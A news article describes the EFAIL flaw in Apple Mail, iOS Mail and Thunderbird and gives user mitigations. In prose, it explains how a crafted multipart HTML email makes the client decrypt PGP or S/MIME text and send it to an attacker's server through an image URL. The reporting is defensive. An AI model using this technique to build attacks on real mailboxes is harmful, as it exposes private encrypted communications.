Researchers have discovered bugs in Apple Mail’s HTML rendering on Mac as well as iOS in addition to Mozilla Thunderbird. These flaws make it possible for attackers to mine plain text from mail messages that were originally sent as encrypted text.
Many businesses rely on PGP and S/MIME encrypted email to keep communications confidential.
The main issue that affects Apple Mail, Mozilla Thunderbird’s client and iOS Mail is a system that utilises multipart responses to take advantage of issues with HTML rendering.
To put it differently: if a hacker gets hold of someone’s encrypted email, they can send that encrypted text back to the user and thereby disclose the unencrypted plain text format without ever requiring the sender’s confidential encryption keys.
Basically, the hacker would have to send three parts: an encrypted text string, an incomplete HTML tag declaration, and the final HTML to close the image tag.
What happens next is that the Mail client decrypts the cypher text, and then renders is as the bogus picture’s source URL.
When the recipient opens the email using their own email client, it will then try to load the URL to open the image. The hacker’s server logs this request, and it then has its own copy of the now unencrypted content. Naturally, the domain forming part of the URL has to be controlled by the hacker to do this, for instance, efail.de.
The only permanent way to resolve this is via a software update, which is undoubtedly in the pipeline. Until then, users can respond by disabling ‘Load remote content in messages’ under Mail Preferences for Mac or Apple Mail. On iOS, this is under ‘iOS Settings and called ‘Load Remote Images’.
You could also completely try removing the PGP keys from the email client, so the app cannot decrypt encoded strings at all.